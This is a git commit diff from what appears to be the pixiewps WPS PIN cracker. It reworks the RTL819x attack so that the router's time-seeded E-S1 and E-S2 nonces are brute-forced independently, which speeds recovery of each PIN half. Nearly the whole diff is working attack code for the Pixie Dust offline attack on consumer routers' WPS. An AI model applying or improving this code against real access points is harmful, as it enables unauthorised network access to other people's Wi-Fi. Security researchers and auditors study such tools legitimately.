find_rtl_es: speed up search by cracking es1 and es2 independently

This commit is contained in:
rofl0r 2017-11-29 19:37:56 +00:00 committed by wiire-a
parent 9d59eda03b
commit 0591369505


@ -49,7 +49,10 @@
uint32_t ecos_rand_simplest(uint32_t *seed); uint32_t ecos_rand_simplest(uint32_t *seed);
uint32_t ecos_rand_simple(uint32_t *seed); uint32_t ecos_rand_simple(uint32_t *seed);
uint32_t ecos_rand_knuth(uint32_t *seed); uint32_t ecos_rand_knuth(uint32_t *seed);
uint_fast8_t crack(struct global *g, char *pin);
static int crack_first_half(struct global *wps, char *pin);
static int crack_second_half(struct global *wps, char *pin);
static int crack(struct global *wps, char *pin);
static const char *option_string = "e:r:s:z:a:n:m:b:o:v:j:5:7:SflVh?"; static const char *option_string = "e:r:s:z:a:n:m:b:o:v:j:5:7:SflVh?";
static const struct option long_options[] = { static const struct option long_options[] = {
@ -293,6 +296,20 @@ unsigned int hardware_concurrency()
#endif #endif
} }
static void rtl_nonce_fill(uint8_t *nonce, uint32_t seed)
{
struct glibc_prng glibc_prng;
int i;
uint8_t *ptr = nonce;
glibc_seed(&glibc_prng, seed);
for (i = 0; i < 4; i++, ptr += 4) {
uint32_t be = end_htobe32(glibc_rand(&glibc_prng));
memcpy(ptr, &be, sizeof be);
}
}
static int find_rtl_es_dir(struct global *wps, char *pin, int dir) static int find_rtl_es_dir(struct global *wps, char *pin, int dir)
{ {
uint_fast8_t found_p_mode = NONE; uint_fast8_t found_p_mode = NONE;
@ -308,61 +325,37 @@ static int find_rtl_es_dir(struct global *wps, char *pin, int dir)
else else
DEBUG_PRINT("Trying backwards in time"); DEBUG_PRINT("Trying backwards in time");
do { for (i = 0; i != break_cond; i += dir) {
i += dir; rtl_nonce_fill(wps->e_s1, wps->nonce_seed + i);
glibc_seed(&glibc_prng, wps->nonce_seed + i);
for (uint_fast8_t j = 0; j < 4; j++) {
uint32_t be = end_htobe32(glibc_rand(&glibc_prng));
memcpy(&(wps->e_s1[4 * j]), &be, sizeof(uint32_t));
}
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* E-S1 = E-S2 != E-Nonce */
wps->s1_seed = wps->nonce_seed + i;
wps->s2_seed = wps->nonce_seed + i;
DEBUG_PRINT("Trying (%10u) with E-S1: ", wps->s1_seed); DEBUG_PRINT("Trying (%10u) with E-S1: ", wps->nonce_seed + i);
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN); DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying (%10u) with E-S2: ", wps->s2_seed);
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, pin); if (crack_first_half(wps, pin)) {
if (r == PIN_FOUND) { DEBUG_PRINT("First pin half found");
found_p_mode = RTL819x; wps->s1_seed = wps->nonce_seed + i;
DEBUG_PRINT("Pin found"); char pin_copy[WPS_PIN_LEN + 1];
} strcpy(pin_copy, pin);
else if (r == PIN_ERROR) { int j;
if (i == 1 || i == -1) { /* we assume that the seed used for es2 is within a range of 10 seconds
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN); /* E-S1 = E-Nonce != E-S2 */ forwards in time only */
memcpy(tmp_s_nonce, wps->e_s2, WPS_SECRET_NONCE_LEN); /* Chaching for next round, see below */ for (j = 0; j < 10; j++) {
} strcpy(pin, pin_copy);
else { rtl_nonce_fill(wps->e_s2, wps->s1_seed + j);
memcpy(wps->e_s1, tmp_s_nonce, WPS_SECRET_NONCE_LEN); DEBUG_PRINT("Trying (%10u) with E-S2: ", wps->s1_seed + j);
memcpy(tmp_s_nonce, wps->e_s2, WPS_SECRET_NONCE_LEN); /* E-S1 = old E-S1, E-S2 = new E-S2 */ DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
} if (crack_second_half(wps, pin)) {
if (dir == 1) { wps->s2_seed = wps->s2_seed + j;
wps->s1_seed = wps->nonce_seed + i - dir; DEBUG_PRINT("Pin found");
wps->s2_seed = wps->nonce_seed + i; return RTL819x;
} }
else {
wps->s1_seed = wps->nonce_seed + i;
wps->s2_seed = wps->nonce_seed + i - dir;
}
DEBUG_PRINT("Trying (%10u) with E-S1: ", wps->s1_seed);
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying (%10u) with E-S2: ", wps->s2_seed);
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r2 = crack(wps, pin);
if (r2 == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found");
} }
} }
} while (found_p_mode == NONE && i != break_cond); }
return NONE;
return found_p_mode;
} }
static int find_rtl_es(struct global *wps, char *pin) static int find_rtl_es(struct global *wps, char *pin)
{ {
@ -1535,15 +1528,17 @@ static int crack_second_half(struct global *wps, char *pin)
} }
uint_to_char_array(second_half, 4, s_pin); uint_to_char_array(second_half, 4, s_pin);
if (check_pin_half(s_pin, wps->psk2, wps->e_s2, wps, wps->e_hash2)) if (check_pin_half(s_pin, wps->psk2, wps->e_s2, wps, wps->e_hash2)) {
pin[8] = 0; /* make sure pin string is zero-terminated */
return 1; return 1;
}
} }
return 0; return 0;
} }
/* PIN cracking attempt - returns 0 for success, 1 for failure */ /* PIN cracking attempt - returns 0 for success, 1 for failure */
uint_fast8_t crack(struct global *wps, char *pin) static int crack(struct global *wps, char *pin)
{ {
return !(crack_first_half(wps, pin) && crack_second_half(wps, pin)); return !(crack_first_half(wps, pin) && crack_second_half(wps, pin));